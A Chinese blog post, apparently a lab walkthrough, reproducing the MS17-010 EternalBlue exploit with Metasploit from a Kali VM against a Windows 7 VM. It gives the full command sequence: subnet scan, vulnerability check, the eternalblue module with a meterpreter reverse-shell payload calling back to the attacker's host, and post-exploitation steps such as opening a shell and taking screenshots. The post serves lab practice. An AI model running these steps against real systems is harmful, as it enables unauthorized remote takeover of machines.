002-MS17-010 永恒之蓝 445端口

已于 2024-09-03 20:35:29 修改
阅读量1k 收藏 7
点赞数 20
分类专栏: Security 文章标签: 安全
于 2024-08-30 23:40:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57017823/article/details/141724973
版权

基础设施

漏洞名:永恒之蓝 

利用端口:445

软件:VMware17.5.1 

攻击机:kali  192.168.2.128

靶机:win7 192.168.2.6

前提:

两机能互相ping通

内网渗透流程:

1)前期交互

确定目标,与kali同一个局域网的主机

查看网络配置

kali

ifconfig

win7

ipconfig

kali网络配置

win7网络配置

互相ping通

2)情报收集

nmap(上帝之眼)扫描

kali (192.168.2.128)

需要进入root权限,才好操作命令,否则有些命令会有问题

sudo su

扫描网段内的存活ip和端口开放情况

┌──(root💀kali)-[/home/kali]
└─# nmap -T4 -A -v -Pn 192.168.2.0/24

可以看到,会扫描整个网段的ip,发现445端口可以利用,win7的IP为2.6

也可以看到windows(被攻击机)的系统

3)威胁建模

根据情报收集,发现win7+445,绝配,可以利用ms17-010永恒之蓝的漏洞

4)漏洞分析

进入msfconsole的终端(msf,大多数人会直接说成是美少妇,所以,就这样)

┌──(root💀kali)-[/home/kali]
└─# msfconsole

查找ms17-010渗透攻击模块

msf6 > search ms17-010

利用测试接口探查主机是否存在永恒之蓝漏洞

        可以直接用数字来代表后面的数字,不用打那么多东西

msf6 > use 3

        

查看要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        required是要求的意思,有yes就是要写的意思

        

需要配置的参数

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.2.6

        win7,被攻击的主机为192.168.2.6,rhost为目标主机,rport是目标主机的端口号,

        再查看一下参数是否配置好了

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

        启动

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

5)渗透攻击

知道有漏洞后,输入use 0进入攻击接口

use 0

再查看一番参数

show options

发现目标主机要设置

、并且因为上面显示没有payload,所以也要配置,把攻击机端口lport也配了吧

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.2.128

set lport 5555

show options

        lport这个没啥大的要求,设置得大点就好,但是也别是8080,8081,21,23这些端口,这些是别的程序要用的

然后,启动

run

这两个都是成功得标志

6)后渗透利用

        攻击

        1.进入对方shell

shell

        2.改变编码方式

C:\Windows\system32>chcp 65001

        3.退出win模式

ctrl+C,然后输入y,回车就OK了

        4.桌面截图

screenshot

        5.查看权限

getuid

        6.远程登录

        这个不是很推荐,因为你在kaili登上后,win7就会退出来,重新登录进去,所以就会打草惊蛇了,但是,也i写上去吧,注意:登陆win7的账号得是win7已有得账号。

        192.168.2.6是win7的IP地址

rdesktop 192.168.2.6

7)报告

        现在就是形成文档阶段的工作了,告诉客户漏洞利用得地方,漏洞的危害,造成的影响以及修复方法,像这篇的,修复方法就有升级系统或者给系统打补丁。

        好困了,后续如果有补充的话会看看吧,可能也会整理一些metasploit的一些攻击命令!

Metasploit 渗透攻击模块解释


0 auxiliary/admin/smb/ms17_010_command // 扫描 445 在线主机,直接执行命令,需要漏洞主机的用户名和密码参数
1 auxiliary/scanner/smb/smb_ms17_010 // 永恒之蓝扫描模块,扫描某个网段
内是否存在 ms17_010 漏洞
2 exploit/windows/smb/ms17_010_eternalblue // 永恒之蓝漏洞利用/攻击模块3 exploit/windows/smb/smb_doublepulsar_rce //SMB 后 门 , 用 于 利 用
DoublePulsar 漏洞实现 SMB 远程代码执行
4 exploit/windows/smb/ms17_010_psexec //直接利用获得 meterpreter 会话,
需要提供用户名和密码参数

余着了......

AA小菜鸡
关注
专栏目录
永恒之蓝漏洞(开放445端口,关闭防火墙)
weixin_48626638的博客
06-23 1万+
小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教 实验目的 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之蓝的漏洞利用原理。 实验原理 永恒之蓝是在Windows的SMB服务处理SMB v1 请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
永恒之蓝漏洞利用(MS17-010)
最新发布
2301_76332302的博客
10-08 998
永恒之蓝漏洞通过TCP的445和139端口,利用SMB1和NBT中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的win主机,进行勒索病毒、挖矿、反弹shell等
永恒之蓝445端口方法
实践求真知
11-22 1万+
第1步:在运行中输入“secpol.msc”,进入IP安全策略设置界面。   第2步:创建IP安全 策略。   第3步:点击 下一步。   第4步:命名IP安全策略,然后点击 下一步。   第5步:“激活默认响应规则”不要勾上,直接下一步。    第6步:点击完成。   第7步:完成IP安全策略的雏形,然后双击该安全策略。   第8步:去勾选 使用“添加向导”点击 添加
避免永恒之蓝病毒,关闭445等危险端口
02-01
避免永恒之蓝病毒,关闭445等危险端口。修改文件后缀为bat,右键以管理员身份运行即可。
利用139/445端口思路——永恒之蓝
jammny
05-30 1万+
前言 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 复现环境: 攻击机:Linux kali2020.2(IP:192.168.23.130) 靶机:Windows 7 X64 (IP:192.168.232.136) 1.目标扫描 这里跳过发现主机过程,用nma..
永恒之蓝(MS17-010)
人们并不感谢罗辑
08-06 1232
SMB协议SMB是一个协议服务器信息块,它是一个客户机/服务器,请求/响应协议,通过SMB协议可以在计算机间共享文件,命名管道等资源,电脑上网上邻居就是靠SMB实现的;
ms17-010 (永恒之蓝)漏洞复现及利用+Wireshark抓包分析
7Riven's blog
12-03 5856
1.实验环境 攻击机:Kali 1)攻击工具:msf 2)分析工具:wireshark 3)IP地址:192.168.109.154(自动获取,NAT模式) 靶 机:Windows7 1)版本 2)开启网络共享(SMB协议) 3)关闭防火墙 4)IP地址:192.168.109.132(自动获取,NAT模式) 2.测试攻击机与靶机的连通性 3.数据库配置...
漏洞复现(一):永恒之蓝ms17-010
weixin_47306547的博客
11-02 6789
目录 永恒之蓝简介 SMB协议 SMB原理 漏洞原理 漏洞危害 漏洞复现 实验环境 完整过程 扫描目标主机是否存在该漏洞 实施攻击 漏洞利用 漏洞防御 永恒之蓝简介 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、...
MS17-010永恒之蓝漏洞原理及复现(学习中,未完善)
chenbx163的博客
08-02 258
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。设置被攻击IP地址后,并执行,然后找到蓝屏命令use0(其他电脑不一定,根据英文选择)并使用。一、什么是永恒之蓝
网络安全 基础之 Windows漏洞复现 (MS17-010永恒之蓝
weixin_60888404的博客
06-01 2429
Windows经典漏洞 永恒之蓝复现
永恒之蓝 屏蔽135-139、445、3389端口脚本
10-15
针对永恒之蓝漏洞,自动导入IP安全策略的脚本屏蔽135-139、445、3389端口,对脚本进行优化,解决了以管理员权限运行脚本时,默认路径是"C:\Windows\system32>" 导致命令找不到策略文件,导入策略失败的问题。 同时加了暂停,方便用户查看导入过程中是否有错误提示。
蠕虫、勒索、永恒之蓝常用135 137 138 139 445端口防护罩
03-21
蠕虫、勒索、永恒之蓝常用135 137 138 139 445端口防护罩
漏洞复现-永恒之蓝MS17-010
qq_60848021的博客
09-19 3079
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
关闭445端口方法(解决永恒之蓝病毒)
m0_37876242的博客
04-10 5788
计算机被永恒之蓝感染后会出一些不明所以的问题,我电脑上不定时蓝屏,同事电脑上也是,网上搜索了解决方法,包括以下几种: 1)使用360杀毒,记得用最新的版本。 2)自己下windows对应补丁。 3)关闭445端口。 ------------------------------------------------------- 注意:(1)关闭了445端口要重启后才会...
利用445 端口渗透
shatianyzg的博客
09-19 1175
靶机win7 445开放 192…168.19.131。渗透kali 192.168.19.129。任务:如何知道win7 ip 地址。提权,将admin加入到管理员账户。135,138,139 蠕虫病毒。利用ms17_010漏洞渗透。kali远程登录到win7。2.破解win7 的账号。
445端口的简单利用
FNjoker的博客
07-22 1万+
445端口的简单利用 前期准备 1.windows10主机一台 2.kali虚拟机一台 3.win7虚拟机一台 4.CobaltStrike4.0 5.将win7虚拟机的445端口开放 简单思路说明 本次实验的目的就是测试一下在靶机开了445端口的情况下如何利用。 实验的思路是在测试到对方主机445端口开放的情况下,利用ipc$建立连接,之后将后门程序上传上去。 实验开始 在win10上输入命令:telnet 192.168.137.129 445 测试一下靶机的445端口的开放情况。 在通的情况下输入如下
渗透测试(445端口
qq_45433707的博客
05-23 2404
笔记 由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到) 1.授权 2.信息收集(nslookup whois) 3.扫描漏洞 ​ namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描; ​ 高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0 ​ 扫描网站漏洞(十大网站漏洞 ) 4.漏洞利用 5.提权(shell环境命令控制权,桌面环境,最高权限) =======删库跑路 6.毁尸灭迹(删除日志) 7.留后门 8.
永恒之蓝445 拿下服务器
hussu的博客
03-10 6000
上文提到内网渗透的时候发现服务器开启了445 接口 目标系统windows server 2008R2 x64 首先ping目标ip,连接通畅 使用service postgresql restart开启postgresql数据库 msfdb init初始化msf框架 msfconsole 打开msf控制台 msf框架db_nmap扫描端口得知目标开启了445端口,445为高危漏洞 ,可能存在永恒之蓝漏洞 search ms17永恒之蓝编号)查找auxiliary验证payload 验证表明有很大几
利用MS17-010永恒之蓝漏洞攻破Win7靶机教程
永恒之蓝漏洞(MS17-010),也称为SMB EternalBlue,是2017年微软Windows系统中发现的一个高危漏洞,主要影响的是Server Message Block (SMB) 协议,这是一个在局域网中广泛使用的文件共享协议。该漏洞存在于Windows...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值